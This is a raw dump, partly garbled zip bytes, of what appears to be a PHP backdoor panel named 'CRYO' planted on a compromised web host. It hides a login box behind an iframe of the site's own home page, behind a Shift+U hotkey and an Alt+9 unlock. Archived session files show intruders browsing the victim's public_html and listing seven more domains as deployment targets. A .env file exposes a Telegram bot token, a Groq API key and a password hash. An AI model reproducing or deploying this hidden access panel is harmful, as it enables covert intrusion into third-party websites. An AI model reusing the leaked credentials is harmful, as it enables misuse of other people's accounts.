span:nth-child(7) { animation-delay: 0.24s; } .wave-text span:nth-child(8) { animation-delay: 0.28s; } .wave-text span:nth-child(9) { animation-delay: 0.32s; } .wave-text span:nth-child(10) { animation-delay: 0.36s; } .wave-text span:nth-child(11) { animation-delay: 0.40s; } .wave-text span:nth-child(12) { animation-delay: 0.44s; } .wave-text span:nth-child(13) { animation-delay: 0.48s; } .wave-text span:nth-child(14) { animation-delay: 0.52s; } .wave-text span:nth-child(15) { animation-delay: 0.56s; } .wave-text span:nth-child(16) { animation-delay: 0.60s; } .wave-text span:nth-child(17) { animation-delay: 0.64s; } .wave-text span:nth-child(18) { animation-delay: 0.68s; } .wave-text span:nth-child(19) { animation-delay: 0.72s; } .wave-text span:nth-child(20) { animation-delay: 0.76s; } .wave-text span:nth-child(21) { animation-delay: 0.80s; } .wave-text span:nth-child(22) { animation-delay: 0.84s; } .wave-text span:nth-child(23) { animation-delay: 0.88s; } .wave-text span:nth-child(24) { animation-delay: 0.92s; } .wave-text span:nth-child(25) { animation-delay: 0.96s; } @keyframes wave { 0% { transform: translateY(0) rotate(0deg); opacity: 0.9; } 25% { transform: translateY(-2px) rotate(3deg); opacity: 1; } 50% { transform: translateY(0) rotate(0deg); opacity: 0.95;} 75% { transform: translateY(2px) rotate(-2deg); opacity: 1; } 100% { transform: translateY(0) rotate(0deg); opacity: 0.9; } } / FLOATING LABEL + INPUT LONJONG KECIL / .field { position: relative; padding-top: 2px; } .field input { width: 100%; border: 1px solid #4a2a2a; background: rgba(0,0,0,0.35); padding: 7px 14px 7px; font-size: 13px; color: #ffeaea; outline: none; border-radius: 999px; transition: border-color .2s ease, background .2s ease, box-shadow .2s ease, transform .15s ease; } .field input::placeholder { color: transparent; } .field input:focus { border-color: #ff8888; background: rgba(0,0,0,0.6); box-shadow: 0 0 0 1px rgba(255,136,136,0.35), 0 0 10px rgba(255,80,80,0.25); transform: translateY(-1px); } .field label { position: absolute; left: 16px; top: 50%; transform: translateY(-50%); font-size: 11px; color: #c79b9b; letter-spacing: .09em; text-transform: uppercase; pointer-events: none; transition: transform .18s ease, font-size .18s ease, color .18s ease, top .18s ease; } .field__bar { position: absolute; left: 14px; right: 14px; bottom: 5px; height: 2px; border-radius: 999px; background: linear-gradient(90deg, #ff4f4f, #ffe3a3, #ff4f4f); background-size: 250% 250%; transform: scaleX(0); transform-origin: center; opacity: 0; transition: transform .22s ease, opacity .18s ease; } .field input:focus + label, .field input:not(:placeholder-shown) + label { top: 4px; transform: none; font-size: 9px; color: #ffd0d0; } .field input:focus ~ .field__bar, .field input:not(:placeholder-shown) ~ .field__bar { transform: scaleX(1); opacity: 1; animation: barFlow 2.2s linear infinite; } @keyframes barFlow { 0% { background-position: 0% 50%; } 50% { background-position: 100% 50%; } 100% { background-position: 0% 50%; } } / NEON BUTTON / .neon-btn { position: relative; width: 100%; margin-top: 4px; padding: 8px 0; border-radius: 999px; border: none; cursor: pointer; font-size: 12px; font-weight: 600; color: #250000; background: linear-gradient(120deg, #ff3636, #ffd26f, #ff3636); background-size: 250% 250%; box-shadow: 0 0 16px rgba(255, 80, 80, 0.85), 0 0 40px rgba(0, 0, 0, 0.9); animation: glowPulse 2.6s ease-in-out infinite alternate, hueShift 7s linear infinite; transition: transform .12s ease, box-shadow .12s ease, opacity .12s ease; display: flex; align-items: center; justify-content: center; } .neon-btn:hover:not(:disabled) { transform: translateY(-1px); box-shadow: 0 0 24px rgba(255, 120, 120, 1), 0 0 60px rgba(0, 0, 0, 1); } .neon-btn:active:not(:disabled) { transform: translateY(1px) scale(.98); box-shadow: 0 0 8px rgba(255, 100, 100, 0.8), 0 0 25px rgba(0, 0, 0, 0.9); } .neon-btn:disabled { opacity: .5; cursor: not-allowed; box-shadow: none; animation-play-state: paused; } @keyframes glowPulse { 0% { filter: brightness(1); } 100% { filter: brightness(1.35); } } @keyframes hueShift { 0% { background-position: 0% 50%; } 50% { background-position: 100% 50%; } 100% { background-position: 0% 50%; } } / ==== RUNAWAY BUTTON ==== / .neon-btn.btn-runaway { position: fixed !important; width: 120px !important; transition: left .18s cubic-bezier(.22,.68,0,1.2), top .18s cubic-bezier(.22,.68,0,1.2), box-shadow .12s ease !important; z-index: 9999; cursor: not-allowed; } #runaway-taunt { position: fixed; z-index: 9998; pointer-events: none; font-size: 11px; font-weight: 600; color: #ffbaba; text-shadow: 0 0 8px rgba(255,80,80,0.9); text-align: center; letter-spacing: .06em; opacity: 0; transition: opacity .3s ease; white-space: nowrap; } #runaway-taunt.visible { opacity: 1; } .alert, .cooldown { font-size: 12px; padding: 7px 10px; margin-bottom: 10px; border-radius: 8px; text-align: center; } .alert { background: rgba(231, 76, 60, 0.97); color: #fff; box-shadow: 0 0 20px rgba(231, 76, 60, 0.5); } .cooldown { background: rgba(243, 156, 18, 0.97); color: #111; box-shadow: 0 0 18px rgba(243, 156, 18, 0.5); } .note { color:#d3a3a3; font-size:11px; margin-top:8px; text-align:center; } .note a { color:#f0b2b2; text-decoration:none; } .note a:hover { color:#ffe0e0; } @media (max-width: 430px) { .login-form-box { width: 90vw; padding: 22px 16px 18px; } .error-box { padding: 22px 18px 18px; } } </style> </head> <body> <iframe id="siteHome" src="<?php echo htmlspecialchars($homeUrl, ENT_QUOTES); ?>" style="position:fixed; inset:0; width:100%; height:100%; border:0;" title="Home" loading="eager" ></iframe> <div class="login-form-box" id="loginBox" role="dialog" aria-modal="true" aria-labelledby="loginTitle"> <div class="login-header"> <h2 id="loginTitle">CRYO</h2> <h5>Version 2.0</h5> </div> <?php if (!empty($cooldown_msg)) echo '<div class="cooldown">'.$cooldown_msg.'</div>'; ?> <?php if (!empty($loginError)) echo '<div class="alert">'.$loginError.'</div>'; ?> <!-- ============ FORM LOGIN ============ --> <form method="post" autocomplete="off"> <input type="hidden" name="csrf" value="<?php echo htmlspecialchars($_SESSION['csrf'], ENT_QUOTES); ?>"> <div class="field"> <input type="text" name="username" id="username" placeholder=" " autofocus required > <label for="username">Username</label> <span class="field__bar"></span> </div> <div class="field"> <input type="password" name="password" id="password" placeholder=" " required > <label for="password">Kuncinya apa?</label> <span class="field__bar"></span> </div> <button class="neon-btn" type="submit" name="login_pw" <?php echo $cooldown_msg ? 'disabled' : ''; ?> > <span class="wave-text" aria-label="Login"> <span>L</span><span>O</span><span>G</span><span>I</span><span>N</span> </span> </button> </form> </div> <script> document.addEventListener("DOMContentLoaded", () => { var loginBox = document.getElementById('loginBox'); var siteHome = document.getElementById('siteHome'); // ===== RUNAWAY LOGIN BUTTON TRICK ===== (function() { var loginBtn = document.querySelector('button[name="login_pw"]'); var loginForm = document.querySelector('form[method="post"]'); if (!loginBtn \|\| !loginForm) return; var taunt = document.getElementById('runaway-taunt'); var taunts = [ "Wkwk lari dulu ya~", "Tangkap kalau bisa!", "Hampir nih, sayang...", "Ngga bisa nih hehe", "Byuurrr~", "Penakut? Atau lamban?", "Mau ke mana emangnya?", "Coba lagi! :P" ]; var tIdx = 0; // === State machine === // 0 = NORMAL : tombol di form, belum hover, Enter diblokir // 1 = FLEEING : tombol lari, Enter diblokir // 2 = UNLOCKED : tombol kembali, Enter bebas (setelah Alt+9) var STATE_NORMAL = 0; var STATE_FLEEING = 1; var STATE_UNLOCKED = 2; var state = STATE_NORMAL; var currentX = 0, currentY = 0; var MARGIN = 20; var btnParent = loginBtn.parentNode; var btnNextSib = loginBtn.nextSibling; function clamp(v, mn, mx) { return Math.min(Math.max(v, mn), mx); } function showTaunt(mx, my) { if (!taunt) return; tIdx = (tIdx + 1) % taunts.length; taunt.textContent = taunts[tIdx]; taunt.style.left = (mx - 50) + 'px'; taunt.style.top = (my - 36) + 'px'; taunt.classList.add('visible'); clearTimeout(taunt._t); taunt._t = setTimeout(function(){ taunt.classList.remove('visible'); }, 900); } function flee(mx, my) { var btnW = loginBtn.offsetWidth \|\| 120; var btnH = loginBtn.offsetHeight \|\| 36; var cx = currentX + btnW / 2; var cy = currentY + btnH / 2; var dx = cx - mx; var dy = cy - my; var dist = Math.sqrt(dxdx + dydy) \|\| 1; var speed = Math.max(100, 200 - dist); var nx = currentX + (dx / dist) speed; var ny = currentY + (dy / dist) * speed; var maxX = window.innerWidth - btnW - MARGIN; var maxY = window.innerHeight - btnH - MARGIN; nx = clamp(nx, MARGIN, maxX); ny = clamp(ny, MARGIN, maxY); if (nx <= MARGIN + 1 \|\| nx >= maxX - 1 \|\| ny <= MARGIN + 1 \|\| ny >= maxY - 1) { nx = clamp(Math.random() * (window.innerWidth - btnW - MARGIN2) + MARGIN, MARGIN, maxX); ny = clamp(Math.random() (window.innerHeight - btnH - MARGIN2) + MARGIN, MARGIN, maxY); } currentX = nx; currentY = ny; loginBtn.style.left = nx + 'px'; loginBtn.style.top = ny + 'px'; } // Hover tombol → picu mode lari (hanya dari STATE_NORMAL) loginBtn.addEventListener('mouseenter', function(e) { if (state !== STATE_NORMAL) return; state = STATE_FLEEING; // Tangkap posisi tombol saat hover (posisi sudah final, tidak ada masalah animasi) var r = loginBtn.getBoundingClientRect(); currentX = r.left; currentY = r.top; // Pindahkan ke body agar position:fixed bebas dari transform parent loginBtn.classList.add('btn-runaway'); loginBtn.style.left = currentX + 'px'; loginBtn.style.top = currentY + 'px'; document.body.appendChild(loginBtn); // Langsung lari dari posisi mouse flee(e.clientX, e.clientY); showTaunt(e.clientX, e.clientY); }); // Mouse bergerak → tombol terus menghindar document.addEventListener('mousemove', function(e) { if (state !== STATE_FLEEING) return; flee(e.clientX, e.clientY); if (Math.random() < 0.15) showTaunt(e.clientX, e.clientY); }); // Blokir Enter (form submit) kecuali sudah UNLOCKED loginForm.addEventListener('submit', function(e) { if (state !== STATE_UNLOCKED) e.preventDefault(); }); // UNLOCK: Alt+9 document.addEventListener('keydown', function(e) { if (e.altKey && (e.key === '9' \|\| e.code === 'Digit9')) { e.preventDefault(); if (state === STATE_UNLOCKED) return; // sudah unlock, abaikan state = STATE_UNLOCKED; // Bersihkan tombol dari mode lari loginBtn.classList.remove('btn-runaway'); loginBtn.style.left = ''; loginBtn.style.top = ''; if (taunt) taunt.classList.remove('visible'); // Kembalikan ke posisi asli di form btnParent.insertBefore(loginBtn, btnNextSib); // Flash hijau konfirmasi — gunakan rAF agar DOM update dulu requestAnimationFrame(function() { loginBtn.style.animationPlayState = 'paused'; loginBtn.style.background = 'linear-gradient(120deg, #36ff7a, #b3ffd1, #36ff7a)'; loginBtn.style.boxShadow = '0 0 28px rgba(50,255,100,0.95)'; setTimeout(function(){ loginBtn.style.background = ''; loginBtn.style.boxShadow = ''; loginBtn.style.animationPlayState = ''; }, 800); }); } }, true); })(); // ===== END RUNAWAY TRICK ===== function hotkeyHandler(e) { if (e.shiftKey && (e.key === 'U' \|\| e.key === 'u')) { showLogin(); } if (e.key === 'Escape' && <?php echo empty($loginError) ? 'true' : 'false'; ?>) { hideLogin(); } } function showLogin() { if (loginBox) loginBox.style.display = "block"; if (siteHome) siteHome.style.filter = "blur(2px)"; document.body.style.overflow = "hidden"; } function hideLogin() { if (loginBox) loginBox.style.display = "none"; if (siteHome) siteHome.style.filter = ""; document.body.style.overflow = "hidden"; } <?php if (!empty($loginError)) { ?> showLogin(); <?php } ?> document.addEventListener('keydown', hotkeyHandler, true); if (siteHome) { siteHome.addEventListener('load', function() { try { if (siteHome.contentWindow && siteHome.contentWindow.document) { siteHome.contentWindow.document.addEventListener('keydown', hotkeyHandler, true); } } catch (err) {} }); } }); </script> <div id="runaway-taunt"></div> </body> </html>PK��ݤ�\޶?n��n��4��.cryo_sessions/sess_fa18b3641c68d91b2b62b6853901675cnu�"�] ��csrf\|s:32:"ffa289dd0ab2ef43b048e2475f67046b";rl\|a:3:{s:5:"start";i:1782499959;s:5:"count";i:0;s:4:"lock";i:0;}PK��ݤ�\Id�n��n��4��.cryo_sessions/sess_e28aac67d3269e74ae36a10da941c1e1nu�"�] ��csrf\|s:32:"f7a8a12ef03f19a14f1551e04394ada4";rl\|a:3:{s:5:"start";i:1782451176;s:5:"count";i:0;s:4:"lock";i:0;}PK��ݤ�\q�2nn��n��4��.cryo_sessions/sess_3b259d3e333ec579c9352574ce4515c4nu�"�] ��csrf\|s:32:"af1bd6d60678b9b491404bbf749ecb09";rl\|a:3:{s:5:"start";i:1781154063;s:5:"count";i:0;s:4:"lock";i:0;}PK��ݤ�\Md��n��n��4��.cryo_sessions/sess_b9b6a7462e787c340d79eb50d3d83679nu�"�] ��csrf\|s:32:"f2884d526c7e35513bd74d3c9f65ee0c";rl\|a:3:{s:5:"start";i:1781075742;s:5:"count";i:0;s:4:"lock";i:0;}PK��ݤ�\��.cryo_sessions/index.htmlnu��[��PK��ݤ�\��4��4��.cryo_sessions/sess_eac224e39704f3de11ba861c3635e177nu�"�] ��csrf\|s:32:"da186c2f34190596bc5bbc061274f9a2";rl\|a:3:{s:5:"start";i:1781075172;s:5:"count";i:0;s:4:"lock";i:0;}logged_in\|b:1;role\|s:5:"admin";user\|s:8:"error404";dir_history\|a:20:{i:0;s:43:"/home/buyherba/public_html/product-category";i:1;s:62:"/home/buyherba/public_html/product-category/research-chemicals";i:2;s:43:"/home/buyherba/public_html/product-category";i:3;s:67:"/home/buyherba/public_html/product-category/buy-psychedelics-online";i:4;s:71:"/home/buyherba/public_html/product-category/buy-psychedelics-online/dmt";i:5;s:43:"/home/buyherba/public_html/product-category";i:6;s:64:"/home/buyherba/public_html/product-category/buy-marijuana-online";i:7;s:71:"/home/buyherba/public_html/product-category/buy-marijuana-online/hybrid";i:8;s:43:"/home/buyherba/public_html/product-category";i:9;s:67:"/home/buyherba/public_html/product-category/buy-concentrates-online";i:10;s:43:"/home/buyherba/public_html/product-category";i:11;s:67:"/home/buyherba/public_html/product-category/buy-psychedelics-online";i:12;s:43:"/home/buyherba/public_html/product-category";i:13;s:67:"/home/buyherba/public_html/product-category/buy-psychedelics-online";i:14;s:26:"/home/buyherba/public_html";i:15;s:58:"/home/buyherba/public_html/buy-k2-spray-online-los-angeles";i:16;s:26:"/home/buyherba/public_html";i:17;s:66:"/home/buyherba/public_html/best-place-to-buy-herbal-incense-online";i:18;s:26:"/home/buyherba/public_html";i:19;s:14:"/home/buyherba";}deploy_scan_items\|a:7:{i:0;a:4:{s:5:"label";s:21:"dermalfilersupply.com";s:6:"target";s:36:"/home/buyherba/dermalfilersupply.com";s:7:"display";s:22:"/dermalfilersupply.com";s:9:"from_root";s:14:"/home/buyherba";}i:1;a:4:{s:5:"label";s:19:"purecannabishub.com";s:6:"target";s:34:"/home/buyherba/purecannabishub.com";s:7:"display";s:20:"/purecannabishub.com";s:9:"from_root";s:14:"/home/buyherba";}i:2;a:4:{s:5:"label";s:26:"k2herbalincenseforsale.com";s:6:"target";s:41:"/home/buyherba/k2herbalincenseforsale.com";s:7:"display";s:27:"/k2herbalincenseforsale.com";s:9:"from_root";s:14:"/home/buyherba";}i:3;a:4:{s:5:"label";s:29:"realilluminatibrotherhood.com";s:6:"target";s:44:"/home/buyherba/realilluminatibrotherhood.com";s:7:"display";s:30:"/realilluminatibrotherhood.com";s:9:"from_root";s:14:"/home/buyherba";}i:4;a:4:{s:5:"label";s:21:"worldcargocourier.com";s:6:"target";s:36:"/home/buyherba/worldcargocourier.com";s:7:"display";s:22:"/worldcargocourier.com";s:9:"from_root";s:14:"/home/buyherba";}i:5;a:4:{s:5:"label";s:24:"illuminatibrotherhood.us";s:6:"target";s:39:"/home/buyherba/illuminatibrotherhood.us";s:7:"display";s:25:"/illuminatibrotherhood.us";s:9:"from_root";s:14:"/home/buyherba";}i:6;a:4:{s:5:"label";s:19:"chronicgurushop.com";s:6:"target";s:34:"/home/buyherba/chronicgurushop.com";s:7:"display";s:20:"/chronicgurushop.com";s:9:"from_root";s:14:"/home/buyherba";}}deploy_scan_message\|s:57:"Scan folder domain/subdomain selesai. Ditemukan 7 target.";CRYO_REPORT_KEY\|s:32:"3d9fc641f923e769ea1872c4660f2c80";PK��ݤ�\�W+Z��Z��.cryo_sessions/.htaccessnu��[��Order allow,deny Deny from all <IfModule mod_authz_core.c> Require all denied </IfModule> PK��ݤ�\\|�>��>��4��.cryo_sessions/sess_033b69fc124925fd4ecdfcc018534a90nu�"�] ��csrf\|s:32:"22f169b8aeb836e168e7d9dffbadbd71";rl\|a:3:{s:5:"start";i:1781075768;s:5:"count";i:0;s:4:"lock";i:0;}logged_in\|b:1;role\|s:5:"semar";user\|s:5:"semar";dir_history\|a:20:{i:0;s:26:"/home/buyherba/public_html";i:1;s:43:"/home/buyherba/public_html/product-category";i:2;s:49:"/home/buyherba/public_html/product-category/vapes";i:3;s:26:"/home/buyherba/public_html";i:4;s:53:"/home/buyherba/public_html/refund-and-return-policies";i:5;s:26:"/home/buyherba/public_html";i:6;s:57:"/home/buyherba/public_html/legit-herbal-incense-site-2025";i:7;s:26:"/home/buyherba/public_html";i:8;s:61:"/home/buyherba/public_html/best-herbal-incense-website-online";i:9;s:26:"/home/buyherba/public_html";i:10;s:34:"/home/buyherba/public_html/product";i:11;s:55:"/home/buyherba/public_html/product/fruity-og-live-resin";i:12;s:26:"/home/buyherba/public_html";i:13;s:43:"/home/buyherba/public_html/product-category";i:14;s:64:"/home/buyherba/public_html/product-category/buy-marijuana-online";i:15;s:43:"/home/buyherba/public_html/product-category";i:16;s:64:"/home/buyherba/public_html/product-category/buy-k2-papers-online";i:17;s:43:"/home/buyherba/public_html/product-category";i:18;s:67:"/home/buyherba/public_html/product-category/buy-psychedelics-online";i:19;s:83:"/home/buyherba/public_html/product-category/buy-psychedelics-online/magic-mushrooms";}PK��ݤ�\� .��Config/.envnu��[��META_NAME=error404 META_DB=$2y$12$Rez2rlIcp7RxIx4WTyJqPeK5JGTuDDGszJtseBNvx0vOnFvZkOVBa TELEGRAM_CHAT_ID=-1002552023732 TELEGRAM_BOT_TOKEN=7590051015:AAH1uCyCQL-xVb619oUdkOuXpgcNLZQQpsU GROQ_API_KEY=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 PK��ݤ�\�� .htaccessnu��[��DirectoryIndex default.php Options -Indexes <FilesMatch "."> Order Allow,Deny Allow from all </FilesMatch> <IfModule mod_authz_core.c> <FilesMatch ".*"> Require all granted </FilesMatch> </IfModule> PK��ݤ�\ �9�� web.confignu��[��<?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <directoryBrowse enabled="false" /> <security> <requestFiltering> <hiddenSegments> <add segment="config" /> </hiddenSegments> <fileExtensions> <add fileExtension=".env" allowed="false" /> <add fileExtension=".ini" allowed="false" /> <add fileExtension=".log" allowed="false" /> <add fileExtension=".sql" allowed="false" /> <add fileExtension=".bak" allowed="false" /> <add fileExtension=".sh" allowed="false" /> </fileExtensions> </requestFiltering> </security> </system.webServer> </configuration> PK��ݤ�\P$+��add.phpnu��[��PK��ݤ�\��vf1��f1��Core/Components/Verify.phpnu��[��PK��ݤ�\��g5��Core/Components/Dashboard.phpnu��[��PK��ݤ�\7��5��Core/Components/Log.phpnu��[��PK��ݤ�\�jί��;��nginx.conf.examplenu��[��PK��ݤ�\NFaz��z��<��default.phpnu��[��PK��ݤ�\޶?n��n��4��G��.cryo_sessions/sess_fa18b3641c68d91b2b62b6853901675cnu�"�] ��PK��ݤ�\Id�n��n��4��.cryo_sessions/sess_e28aac67d3269e74ae36a10da941c1e1nu�"�] ��PK��ݤ�\q�2nn��n��4��.cryo_sessions/sess_3b259d3e333ec579c9352574ce4515c4nu�"�] ��PK��ݤ�\Md��n��n��4��.cryo_sessions/sess_b9b6a7462e787c340d79eb50d3d83679nu�"�] ��PK��ݤ�\��.cryo_sessions/index.htmlnu��[��PK��ݤ�\��4��4��.cryo_sessions/sess_eac224e39704f3de11ba861c3635e177nu�"�] ��PK��ݤ�\�W+Z��Z��.cryo_sessions/.htaccessnu��[��PK��ݤ�\\|�>��>��4��y��.cryo_sessions/sess_033b69fc124925fd4ecdfcc018534a90nu�"�] ��PK��ݤ�\� .��Config/.envnu��[��PK��ݤ�\�� [��.htaccessnu��[��PK��ݤ�\ �9�� web.confignu��[��PK��9��~��

| ver. 1.4 | Github | . | PHP 8.1.34 | Generation time: 0.23 | proxy | phpinfo | Settings